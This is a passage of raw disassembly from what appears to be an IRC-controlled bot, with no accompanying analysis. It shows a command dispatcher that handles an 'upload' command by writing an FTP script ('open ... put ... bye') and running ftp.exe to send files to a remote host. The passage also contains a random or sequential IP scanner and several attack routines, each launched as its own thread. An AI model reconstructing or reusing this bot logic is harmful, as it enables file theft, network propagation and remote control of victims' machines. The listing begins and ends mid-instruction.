--------------------------------------------------------------------------- loc_4070ED: ; CODE XREF: sub_401ACD+560Dj push ebx push [ebp+var_4] push offset unk_42AED0 loc_4070F6: ; CODE XREF: sub_401ACD+5681j push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 14h jmp loc_4072E9 ; --------------------------------------------------------------------------- loc_40710C: ; CODE XREF: sub_401ACD+5611j push [ebp+arg_1C] lea eax, [ebp+var_2C4] push offset unk_42AE9C push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 20h loc_40713C: ; CODE XREF: sub_401ACD+55F6j cmp [ebp+arg_1C], ebx jnz loc_4072E9 loc_407145: ; CODE XREF: sub_401ACD+561Ej push ebx push [ebp+var_4] push offset unk_42AE68 jmp short loc_4070F6 ; --------------------------------------------------------------------------- loc_407150: ; CODE XREF: sub_401ACD+4FC7j ; sub_401ACD+4FDEj ... mov eax, [ebp+var_8] push 7Fh push [ebp+arg_10] mov [ebp+var_C64], eax mov eax, [ebp+var_4] mov [ebp+var_C68], eax lea eax, [ebp+var_CFC] push eax call sub_41B5F0 push edi call sub_41B779 push [ebp+arg_0] mov [ebp+var_C7C], eax call sub_41B779 push [ebp+arg_18] mov [ebp+var_C78], eax call sub_41B779 mov esi, [ebp+esi+var_7C] add esp, 18h cmp esi, ebx mov [ebp+var_C74], eax jz short loc_4071B5 push esi call sub_41B779 pop ecx mov [ebp+var_C70], eax jmp short loc_4071BB ; --------------------------------------------------------------------------- loc_4071B5: ; CODE XREF: sub_401ACD+56D7j mov [ebp+var_C70], ebx loc_4071BB: ; CODE XREF: sub_401ACD+56E6j push 7Fh lea eax, [ebp+var_D7C] push [ebp+var_88] push eax call sub_41B5F0 add esp, 0Ch mov esi, [ebp+arg_4] lea eax, [ebp+var_CFC] mov [ebp+var_D80], esi push [ebp+var_C74] push [ebp+var_C78] push eax lea eax, [ebp+var_2C4] push [ebp+var_C7C] push offset unk_42AE20 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 17h push eax call sub_40B0F7 add esp, 24h mov [ebp+var_C6C], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_D80] push ebx push eax push offset sub_413411 push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_C6C] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_40725E loc_40724C: ; CODE XREF: sub_401ACD+578Fj cmp [ebp+var_C60], ebx jnz short loc_407279 push 32h call dword_427078 ; Sleep jmp short loc_40724C ; --------------------------------------------------------------------------- loc_40725E: ; CODE XREF: sub_401ACD+577Dj call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42ADE8 loc_40726A: ; CODE XREF: sub_401ACD+4E32j ; sub_401ACD+62BFj ... lea eax, [ebp+var_2C4] push eax call sub_41B886 add esp, 0Ch loc_407279: ; CODE XREF: sub_401ACD+4E16j ; sub_401ACD+5785j ... cmp [ebp+var_8], ebx jnz loc_4083BD push ebx push [ebp+var_4] loc_407286: ; CODE XREF: sub_401ACD+22DFj lea eax, [ebp+var_2C4] push eax push [ebp+var_88] push esi jmp loc_4082A9 ; --------------------------------------------------------------------------- loc_407299: ; CODE XREF: sub_401ACD+4F99j ; sub_401ACD+4FB0j push 0Bh call sub_40B33F push edi mov [ebp+arg_1C], eax call sub_41B779 add eax, [ebp+arg_1C] pop ecx pop ecx cmp eax, 1F4h jle loc_407455 push [ebp+arg_1C] lea eax, [ebp+var_2C4] push offset unk_42ADA8 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 20h loc_4072E9: ; CODE XREF: sub_401ACD+526Ej ; sub_401ACD+563Aj ... mov esi, [ebp+esi+var_7C] cmp esi, ebx jz loc_401E94 push [ebp+arg_8] push offset aUpload ; "upload" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_409855 push 4 push esi call sub_416909 pop ecx test eax, eax pop ecx jnz short loc_407325 push esi push offset unk_42AD80 jmp loc_408CDC ; --------------------------------------------------------------------------- loc_407325: ; CODE XREF: sub_401ACD+584Bj call dword_4270A8 ; GetTickCount push eax call sub_41B8D8 pop ecx call sub_41B8E2 push 9 cdq pop ecx idiv ecx push edx call sub_41B8E2 push 63h cdq pop ecx idiv ecx push edx call sub_41B8E2 cdq mov ecx, 3E7h idiv ecx lea eax, [ebp+var_51F8] push edx push eax lea eax, [ebp+var_2E58] push offset aSIII_dll ; "%s\\%i%i%i.dll" push eax call sub_41B886 lea eax, [ebp+var_2E58] push offset aAb ; "ab" push eax call sub_41B4C2 add esp, 20h cmp eax, ebx mov [ebp+arg_24], eax jz loc_401E94 push esi push [ebp+arg_18] push [ebp+arg_0] push edi push [ebp+arg_10] push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n" push eax call sub_41BE06 push [ebp+arg_24] call sub_41B05B add esp, 20h lea eax, [ebp+var_2E58] push eax lea eax, [ebp+var_4CF0] push offset aSS_3 ; "-s:%s" push eax call sub_41B886 add esp, 0Ch lea eax, [ebp+var_4CF0] push ebx push ebx push eax push offset aFtp_exe ; "ftp.exe" push offset aOpen ; "open" push ebx call ds:dword_4CB5C0 push [ebp+arg_10] test eax, eax push esi jz short loc_4073F4 push offset unk_42AD10 jmp short loc_4073F9 ; --------------------------------------------------------------------------- loc_4073F4: ; CODE XREF: sub_401ACD+591Ej push offset unk_42ACE0 loc_4073F9: ; CODE XREF: sub_401ACD+5925j call sub_41B886 add esp, 0Ch cmp [ebp+var_8], ebx jnz short loc_407422 push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 14h loc_407422: ; CODE XREF: sub_401ACD+5937j lea eax, [ebp+var_2C4] push eax call sub_4151AD loc_40742E: ; CODE XREF: sub_401ACD+5986j lea eax, [ebp+var_2E58] push 4 push eax call sub_416909 add esp, 0Ch test eax, eax jz loc_401E94 lea eax, [ebp+var_2E58] push eax call sub_41BDDC jmp short loc_40742E ; --------------------------------------------------------------------------- loc_407455: ; CODE XREF: sub_401ACD+57E6j push [ebp+arg_10] call sub_41B779 push edi mov [ebp+var_370], eax call sub_41B779 push [ebp+arg_0] mov [ebp+var_358], eax call sub_41B779 add esp, 0Ch cmp eax, 5 mov [ebp+var_36C], eax jnb short loc_40748E push 5 pop eax mov [ebp+var_36C], eax loc_40748E: ; CODE XREF: sub_401ACD+59B6j push 3Ch pop ecx cmp eax, ecx jbe short loc_40749B mov [ebp+var_36C], ecx loc_40749B: ; CODE XREF: sub_401ACD+59C6j push [ebp+arg_18] call sub_41B779 mov [ebp+var_368], eax mov eax, 320h cmp [ebp+var_368], eax pop ecx jbe short loc_4074BD mov [ebp+var_368], eax loc_4074BD: ; CODE XREF: sub_401ACD+59E8j or [ebp+var_354], 0FFFFFFFFh cmp dword_431B00, ebx mov [ebp+arg_20], ebx jz short loc_40750C mov edi, offset dword_431B00 loc_4074D4: ; CODE XREF: sub_401ACD+5A21j push [ebp+arg_10] lea eax, [edi-28h] push eax call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_4074F2 inc [ebp+arg_20] add edi, 40h cmp [edi], ebx jnz short loc_4074D4 jmp short loc_40750C ; --------------------------------------------------------------------------- loc_4074F2: ; CODE XREF: sub_401ACD+5A17j mov eax, [ebp+arg_20] mov ecx, eax mov [ebp+var_354], eax shl ecx, 6 mov ecx, dword_431B00[ecx] mov [ebp+var_370], ecx loc_40750C: ; CODE XREF: sub_401ACD+5A00j ; sub_401ACD+5A23j cmp [ebp+var_370], ebx jnz short loc_40751E push offset unk_42ACAC jmp loc_406F05 ; --------------------------------------------------------------------------- loc_40751E: ; CODE XREF: sub_401ACD+5A45j mov edi, [ebp+esi+var_7C] cmp edi, ebx mov [ebp+arg_0], edi jz short loc_407559 cmp byte ptr [edi], 23h jz short loc_407559 push edi lea eax, [ebp+var_484] push 10h push eax call sub_41B980 push 78h push edi call sub_41BFB0 add esp, 14h neg eax sbb eax, eax neg eax mov [ebp+var_344], eax jmp loc_407633 ; --------------------------------------------------------------------------- loc_407559: ; CODE XREF: sub_401ACD+5A5Aj ; sub_401ACD+5A5Fj cmp [ebp+var_8FF], bl jnz short loc_40757B cmp [ebp+var_8FE], bl jnz short loc_40757B cmp [ebp+var_8EE], bl jnz short loc_40757B push offset unk_42AC78 jmp loc_406F05 ; --------------------------------------------------------------------------- loc_40757B: ; CODE XREF: sub_401ACD+5A92j ; sub_401ACD+5A9Aj ... push 10h lea eax, [ebp+var_2D0] pop edi push eax lea eax, [ebp+var_2F8] push eax mov [ebp+var_2D0], edi push [ebp+arg_4] call ds:dword_4CB5F8 ; getsockname mov al, [ebp+var_8FF] push edi neg al sbb eax, eax and ax, 100h add eax, 0FFFFh and [ebp+var_2F4], eax push [ebp+var_2F4] call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_484] push eax call sub_41B5F0 add esp, 0Ch cmp [ebp+var_8EE], bl jz short loc_40762D xor eax, eax cmp [ebp+var_8FF], bl push 30h setnz al inc eax inc eax mov edi, eax lea eax, [ebp+var_484] push eax call sub_41BE40 pop ecx cmp edi, ebx pop ecx mov byte ptr [ebp+arg_24+3], bl jle short loc_407621 loc_4075FF: ; CODE XREF: sub_401ACD+5B52j cmp eax, ebx jz short loc_407621 mov byte ptr [eax], 78h lea eax, [ebp+var_484] push 30h push eax call sub_41BE40 inc byte ptr [ebp+arg_24+3] pop ecx pop ecx movsx ecx, byte ptr [ebp+arg_24+3] cmp ecx, edi jl short loc_4075FF loc_407621: ; CODE XREF: sub_401ACD+5B30j ; sub_401ACD+5B34j mov [ebp+var_344], 1 jmp short loc_407633 ; --------------------------------------------------------------------------- loc_40762D: ; CODE XREF: sub_401ACD+5B0Aj mov [ebp+var_344], ebx loc_407633: ; CODE XREF: sub_401ACD+5A87j ; sub_401ACD+5B5Ej mov eax, [ebp+arg_4] push [ebp+var_88] mov [ebp+var_374], eax mov eax, [ebp+var_4] mov [ebp+var_34C], eax mov eax, [ebp+var_8] mov [ebp+var_348], eax mov edi, 80h lea eax, [ebp+var_474] push edi push eax call sub_41B980 mov esi, [ebp+esi+var_78] add esp, 0Ch cmp esi, ebx jz short loc_407684 loc_407671: ; CODE XREF: sub_401ACD+5BDAj push esi loc_407672: ; CODE XREF: sub_401ACD+5BC4j lea eax, [ebp+var_3F4] push edi push eax call sub_41B980 add esp, 0Ch jmp short loc_4076AF ; --------------------------------------------------------------------------- loc_407684: ; CODE XREF: sub_401ACD+5BA2j mov eax, [ebp+arg_0] cmp eax, ebx jz short loc_407693 cmp byte ptr [eax], 23h jnz short loc_407693 push eax jmp short loc_407672 ; --------------------------------------------------------------------------- loc_407693: ; CODE XREF: sub_401ACD+5BBCj ; sub_401ACD+5BC1j mov esi, offset aF ; "#f" push offset byte_43D808 push esi call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_407671 mov [ebp+var_3F4], bl loc_4076AF: ; CODE XREF: sub_401ACD+5BB5j cmp [ebp+var_344], ebx mov eax, offset aRandom ; "Random" jnz short loc_4076C1 mov eax, offset aSequential ; "Sequential" loc_4076C1: ; CODE XREF: sub_401ACD+5BEDj push [ebp+var_358] lea ecx, [ebp+var_484] push [ebp+var_368] push [ebp+var_36C] push [ebp+var_370] push ecx push eax lea eax, [ebp+var_2C4] push offset unk_42AC10 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 0Bh push eax call sub_40B0F7 add esp, 2Ch mov [ebp+var_364], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_484] push ebx push eax push offset sub_40C33D push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_364] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_40774F loc_407739: ; CODE XREF: sub_401ACD+5C80j cmp [ebp+var_340], ebx jnz loc_40828C push 32h call dword_427078 ; Sleep jmp short loc_407739 ; --------------------------------------------------------------------------- loc_40774F: ; CODE XREF: sub_401ACD+5C6Aj call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42ABD8 jmp loc_4049EC ; --------------------------------------------------------------------------- loc_407760: ; CODE XREF: sub_401ACD+4F6Bj ; sub_401ACD+4F82j push [ebp+arg_10] call sub_40AAFA push edi mov [ebp+var_4E0], eax call sub_41B779 push [ebp+arg_0] mov [ebp+var_4F0], eax call sub_41B779 push [ebp+arg_18] mov [ebp+var_4EC], eax call sub_41B779 mov esi, [ebp+arg_4] push 7Fh push [ebp+var_88] mov [ebp+var_4E8], eax lea eax, [ebp+var_570] mov [ebp+var_574], esi push eax call sub_41B5F0 add esp, 1Ch mov edi, [ebp+var_4] mov eax, [ebp+var_8] mov [ebp+var_4D8], edi push [ebp+var_4EC] mov [ebp+var_4D4], eax push [ebp+var_4F0] push [ebp+var_4E8] push [ebp+var_4E0] call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_2C4] push offset unk_42AB88 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 0Bh push eax call sub_40B0F7 add esp, 24h mov [ebp+var_4E4], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_574] push ebx push eax push offset sub_40C75A push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_4E4] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_407855 loc_40783F: ; CODE XREF: sub_401ACD+5D86j cmp [ebp+var_4D0], ebx jnz loc_403DA1 push 32h call dword_427078 ; Sleep jmp short loc_40783F ; --------------------------------------------------------------------------- loc_407855: ; CODE XREF: sub_401ACD+5D70j call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42AB4C jmp loc_403D92 ; --------------------------------------------------------------------------- loc_407866: ; CODE XREF: sub_401ACD+4F2Ej ; sub_401ACD+4F45j push [ebp+arg_10] call sub_41B779 imul eax, 234h pop ecx cmp byte_43E5A8[eax], bl jz loc_409855 cmp [ebp+var_C], ebx jz loc_409855 push edi call sub_41AFE0 push [ebp+arg_10] mov esi, eax call sub_41AFE0 push [ebp+arg_8] add esi, eax call sub_41AFE0 add eax, [ebp+var_C] push [ebp+arg_0] lea eax, [eax+esi+2] push eax call sub_41B900 add esp, 14h mov esi, eax lea eax, [ebp+var_2C4] push esi push offset dword_42AB40 push eax call sub_41B886 add esp, 0Ch cmp esi, ebx jz loc_409855 push [ebp+arg_10] call sub_41B779 test eax, eax pop ecx jle loc_409855 push [ebp+arg_10] call sub_41B779 cmp eax, 400h pop ecx jge loc_409855 push ebx lea eax, [ebp+var_2C4] push ebx push eax push edi push [ebp+arg_10] call sub_41B779 imul eax, 234h pop ecx push dword_43E59C[eax] call sub_409A73 push [ebp+arg_10] call sub_41B779 imul eax, 234h add esp, 18h cmp byte ptr dword_43E390[eax], 73h jnz loc_409855 push esi push [ebp+arg_10] call sub_41B779 imul eax, 234h pop ecx add eax, offset byte_43E5A8 push eax push edi push offset aSSS_2 ; "[%s] * %s %s" jmp loc_407A36 ; --------------------------------------------------------------------------- loc_40795E: ; CODE XREF: sub_401ACD+4F00j ; sub_401ACD+4F17j push [ebp+arg_10] call sub_41B779 imul eax, 234h pop ecx cmp byte_43E5A8[eax], bl jz loc_409855 cmp [ebp+var_C], ebx jz loc_409855 push edi call sub_41AFE0 push [ebp+arg_10] mov esi, eax call sub_41AFE0 push [ebp+arg_8] add esi, eax call sub_41AFE0 add eax, [ebp+var_C] push [ebp+arg_0] lea eax, [eax+esi+2] push eax call sub_41B900 mov esi, eax add esp, 14h cmp esi, ebx jz loc_409855 push [ebp+arg_10] call sub_41B779 test eax, eax pop ecx jle loc_409855 push [ebp+arg_10] call sub_41B779 cmp eax, 400h pop ecx jge loc_409855 push ebx push ebx push esi push edi push [ebp+arg_10] call sub_41B779 imul eax, 234h pop ecx push dword_43E59C[eax] call sub_409A73 push [ebp+arg_10] call sub_41B779 imul eax, 234h add esp, 18h cmp byte ptr dword_43E390[eax], 73h jnz loc_409855 push esi push [ebp+arg_10] call sub_41B779 imul eax, 234h pop ecx add eax, offset byte_43E5A8 push eax push edi push offset aSSS_1 ; "[%s] <%s> %s" loc_407A36: ; CODE XREF: sub_401ACD+5E8Cj lea eax, [ebp+var_2C4] push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 28h jmp loc_409855 ; --------------------------------------------------------------------------- loc_407A63: ; CODE XREF: sub_401ACD+4ED2j ; sub_401ACD+4EE9j push [ebp+arg_10] call ds:dword_4CB694 ; inet_addr push edi mov [ebp+var_680], eax call sub_41B779 push [ebp+arg_0] mov [ebp+var_690], eax call sub_41B779 mov esi, [ebp+arg_4] push 7Fh push [ebp+var_88] mov [ebp+var_688], eax lea eax, [ebp+var_710] mov [ebp+var_714], esi push eax call sub_41B5F0 add esp, 14h mov edi, [ebp+var_4] mov eax, [ebp+var_8] mov [ebp+var_678], edi push [ebp+var_688] mov [ebp+var_674], eax push [ebp+var_690] push [ebp+var_680] call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_2C4] push offset unk_42AAE4 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 0Bh push eax call sub_40B0F7 add esp, 20h mov [ebp+var_684], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_714] push ebx push eax push offset sub_40C669 push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_684] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_407B45 loc_407B2F: ; CODE XREF: sub_401ACD+6076j cmp [ebp+var_670], ebx jnz loc_403DA1 push 32h call dword_427078 ; Sleep jmp short loc_407B2F ; --------------------------------------------------------------------------- loc_407B45: ; CODE XREF: sub_401ACD+6060j call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42ABD8 jmp loc_403D92 ; --------------------------------------------------------------------------- loc_407B56: ; CODE XREF: sub_401ACD+4EA4j ; sub_401ACD+4EBBj push [ebp+arg_10] call sub_41B779 mov [ebp+var_112C], eax push 7Fh lea eax, [ebp+var_1230] push edi push eax call sub_41B5F0 push [ebp+arg_0] call sub_41B779 mov esi, [ebp+arg_4] add esp, 14h mov [ebp+var_1130], eax lea eax, [ebp+var_11B0] push [ebp+var_88] mov [ebp+var_1238], esi push 80h push eax call sub_41B980 mov eax, [ebp+var_8] add esp, 0Ch mov edi, [ebp+var_4] mov [ebp+var_111C], eax push [ebp+var_1130] lea eax, [ebp+var_1230] mov [ebp+var_1120], edi push eax push [ebp+var_112C] push esi call sub_40AC10 pop ecx push eax lea eax, [ebp+var_2C4] push offset unk_42AAA8 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 18h push eax call sub_40B0F7 add esp, 24h mov [ebp+var_1128], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_1238] push ebx push eax push offset sub_4103AB push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_1128] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_407C42 loc_407C2C: ; CODE XREF: sub_401ACD+6173j cmp [ebp+var_1118], ebx jnz loc_403DA1 push 32h call dword_427078 ; Sleep jmp short loc_407C2C ; --------------------------------------------------------------------------- loc_407C42: ; CODE XREF: sub_401ACD+615Dj call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42AA64 jmp loc_403D92 ; --------------------------------------------------------------------------- loc_407C53: ; CODE XREF: sub_401ACD+4E76j ; sub_401ACD+4E8Dj push 0FFh lea eax, [ebp+var_2878] push [ebp+arg_10] push eax call sub_41B5F0 push 0FFh lea eax, [ebp+var_2778] push edi push eax call sub_41B5F0 push [ebp+arg_0] mov [ebp+var_2674], ebx call sub_41B779 mov [ebp+var_2670], eax mov eax, [ebp+esi+var_80] add esp, 1Ch cmp eax, ebx jz short loc_407CAC push 10h push ebx push eax call sub_41BDC5 add esp, 0Ch mov [ebp+var_2668], eax jmp short loc_407CB2 ; --------------------------------------------------------------------------- loc_407CAC: ; CODE XREF: sub_401ACD+61C9j mov [ebp+var_2668], ebx loc_407CB2: ; CODE XREF: sub_401ACD+61DDj mov esi, [ebp+esi+var_7C] cmp esi, ebx jz short loc_407CC9 push esi call sub_41B779 pop ecx mov [ebp+var_266C], eax jmp short loc_407CCF ; --------------------------------------------------------------------------- loc_407CC9: ; CODE XREF: sub_401ACD+61EBj mov [ebp+var_266C], ebx loc_407CCF: ; CODE XREF: sub_401ACD+61FAj movzx eax, [ebp+var_8FB] mov esi, [ebp+arg_4] push 7Fh push [ebp+var_88] mov [ebp+var_2664], eax lea eax, [ebp+var_28F8] mov [ebp+var_28FC], esi push eax call sub_41B5F0 mov eax, [ebp+var_4] add esp, 0Ch mov [ebp+var_265C], eax mov eax, [ebp+var_8] push edi mov [ebp+var_2660], eax push [ebp+arg_10] lea eax, [ebp+var_2C4] push offset unk_42AA38 push eax call sub_41B886 push esi lea eax, [ebp+var_2C4] push 1Dh push eax call sub_40B0F7 add esp, 1Ch mov [ebp+var_2678], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_28FC] push ebx push eax push offset sub_4163FA push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_2678] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_407D80 loc_407D6A: ; CODE XREF: sub_401ACD+62B1j cmp [ebp+var_2658], ebx jnz loc_407279 push 32h call dword_427078 ; Sleep jmp short loc_407D6A ; --------------------------------------------------------------------------- loc_407D80: ; CODE XREF: sub_401ACD+629Bj call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42A9F8 jmp loc_40726A ; --------------------------------------------------------------------------- loc_407D91: ; CODE XREF: sub_401ACD+4E48j ; sub_401ACD+4E5Fj push 7Fh lea eax, [ebp+var_3490] pop esi push esi push [ebp+arg_10] push eax call sub_41B5F0 push esi lea eax, [ebp+var_3410] push edi push eax call sub_41B5F0 push esi lea eax, [ebp+var_3390] push [ebp+arg_0] push eax call sub_41B5F0 push esi lea eax, [ebp+var_3310] push [ebp+var_88] push eax call sub_41B5F0 mov eax, [ebp+var_4] add esp, 30h mov esi, [ebp+arg_4] mov [ebp+var_328C], eax push [ebp+arg_0] mov eax, [ebp+var_8] mov [ebp+var_3288], eax lea eax, [ebp+var_2C4] push edi mov [ebp+var_3494], esi push [ebp+arg_10] push offset unk_42A9BC push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 12h push eax call sub_40B0F7 add esp, 20h mov [ebp+var_3290], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_3494] push ebx push eax push offset sub_414A92 push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_3290] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_407E68 loc_407E52: ; CODE XREF: sub_401ACD+6399j cmp [ebp+var_3284], ebx jnz loc_407279 push 32h call dword_427078 ; Sleep jmp short loc_407E52 ; --------------------------------------------------------------------------- loc_407E68: ; CODE XREF: sub_401ACD+6383j call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42A984 jmp loc_40726A ; --------------------------------------------------------------------------- loc_407E79: ; CODE XREF: sub_401ACD+4D1Bj ; sub_401ACD+4D32j push 7Fh lea eax, [ebp+var_3068] pop esi push esi push [ebp+arg_10] push eax call sub_41B5F0 push esi lea eax, [ebp+var_2FE8] push edi push eax call sub_41B5F0 push esi lea eax, [ebp+var_2F68] push [ebp+arg_0] push eax call sub_41B5F0 push esi lea eax, [ebp+var_2EE8] push [ebp+var_88] push eax call sub_41B5F0 mov eax, [ebp+var_4] add esp, 30h mov esi, [ebp+arg_4] mov [ebp+var_2E64], eax push [ebp+arg_0] mov eax, [ebp+var_8] mov [ebp+var_2E60], eax lea eax, [ebp+var_2C4] push edi mov [ebp+var_306C], esi push [ebp+arg_10] push offset unk_42A954 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 0Eh push eax call sub_40B0F7 add esp, 20h mov [ebp+var_2E68], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_306C] push ebx push eax push offset sub_4137CD push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_2E68] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_407F50 loc_407F3A: ; CODE XREF: sub_401ACD+6481j cmp [ebp+var_2E5C], ebx jnz loc_407279 push 32h call dword_427078 ; Sleep jmp short loc_407F3A ; --------------------------------------------------------------------------- loc_407F50: ; CODE XREF: sub_401ACD+646Bj call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42A91C jmp loc_40726A ; --------------------------------------------------------------------------- loc_407F61: ; CODE XREF: sub_401ACD+4BF2j ; sub_401ACD+4C09j ... push 7Fh lea eax, [ebp+var_3CE4] pop esi push esi push [ebp+arg_10] push eax call sub_41B5F0 push esi lea eax, [ebp+var_3C64] push edi push eax call sub_41B5F0 push esi lea eax, [ebp+var_3BE4] push [ebp+arg_0] push eax call sub_41B5F0 push esi lea eax, [ebp+var_3B64] push [ebp+var_88] push eax call sub_41B5F0 push 20h lea eax, [ebp+var_3AE4] push [ebp+arg_8] push eax call sub_41B5F0 mov eax, [ebp+var_4] add esp, 3Ch mov esi, [ebp+arg_4] mov [ebp+var_3A64], eax push [ebp+arg_0] mov eax, [ebp+var_8] mov [ebp+var_3A60], eax lea eax, [ebp+var_2C4] push edi mov [ebp+var_3CEC], esi push [ebp+arg_10] push offset unk_42A8EC push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 0Dh push eax call sub_40B0F7 add esp, 20h mov [ebp+var_3CE8], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_3CEC] push ebx push eax push offset sub_412A54 push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_3CE8] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_408049 loc_408033: ; CODE XREF: sub_401ACD+657Aj cmp [ebp+var_3A5C], ebx jnz loc_407279 push 32h call dword_427078 ; Sleep jmp short loc_408033 ; --------------------------------------------------------------------------- loc_408049: ; CODE XREF: sub_401ACD+6564j call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42A8B4 jmp loc_40726A ; --------------------------------------------------------------------------- loc_40805A: ; CODE XREF: sub_401ACD+4BC4j ; sub_401ACD+4BDBj push 7Fh lea eax, [ebp+var_1778] push [ebp+arg_10] push eax call sub_41B5F0 push edi call sub_41B779 push 3Fh mov [ebp+var_1628], eax push [ebp+arg_0] lea eax, [ebp+var_16F8] push eax call sub_41B5F0 mov esi, [ebp+esi+var_80] add esp, 1Ch cmp esi, ebx jz short loc_4080A5 push 3Fh lea eax, [ebp+var_16B8] push esi push eax call sub_41B5F0 add esp, 0Ch loc_4080A5: ; CODE XREF: sub_401ACD+65C4j lea eax, [ebp+var_16F8] mov [ebp+var_1624], 1 push eax lea eax, [ebp+var_1778] push [ebp+var_1628] push eax lea eax, [ebp+var_2C4] push offset dword_42A884 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 1Fh push eax call sub_40B0F7 add esp, 20h mov [ebp+var_1620], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_177C] push ebx push eax push offset sub_4017ED push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_1620] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_408131 loc_40811B: ; CODE XREF: sub_401ACD+6662j cmp [ebp+var_161C], ebx jnz loc_406CDF push 32h call dword_427078 ; Sleep jmp short loc_40811B ; --------------------------------------------------------------------------- loc_408131: ; CODE XREF: sub_401ACD+664Cj call dword_42708C ; RtlGetLastWin32Error push eax push offset dword_42A848 jmp loc_406CD0 ; --------------------------------------------------------------------------- loc_408142: ; CODE XREF: sub_401ACD+4B84j ; sub_401ACD+4B9Bj push edi call sub_41B779 cmp eax, ebx pop ecx mov [ebp+var_1D64], eax jle loc_408235 push [ebp+arg_10] mov esi, 80h lea eax, [ebp+var_1EEC] push esi push eax call sub_41B980 add esp, 0Ch xor eax, eax cmp [ebp+var_8EE], bl push [ebp+var_88] setnz al mov [ebp+var_1D60], eax mov eax, [ebp+arg_4] mov [ebp+var_1EF0], eax lea eax, [ebp+var_1DEC] push esi push eax call sub_41B980 mov eax, [ebp+var_4] add esp, 0Ch mov [ebp+var_1D5C], eax mov eax, [ebp+var_8] push edi mov [ebp+var_1D58], eax push [ebp+arg_10] lea eax, [ebp+var_2C4] push offset unk_42A81C push 200h push eax call sub_41B980 push ebx lea eax, [ebp+var_2C4] push 15h push eax call sub_40B0F7 add esp, 20h mov [ebp+var_1D6C], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_1EF0] push ebx push eax push offset sub_412E9E push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_1D6C] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_408224 loc_408212: ; CODE XREF: sub_401ACD+6755j cmp [ebp+var_1D54], ebx jnz short loc_40828C push 32h call dword_427078 ; Sleep jmp short loc_408212 ; --------------------------------------------------------------------------- loc_408224: ; CODE XREF: sub_401ACD+6743j call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42A7E4 jmp loc_4049EC ; --------------------------------------------------------------------------- loc_408235: ; CODE XREF: sub_401ACD+6684j push offset unk_42A7AC jmp loc_406F05 ; --------------------------------------------------------------------------- loc_40823F: ; CODE XREF: sub_401ACD+4B56j ; sub_401ACD+4B6Dj push edi push [ebp+arg_10] call dword_4270B4 ; MoveFileA test eax, eax jz short loc_40826C push edi lea eax, 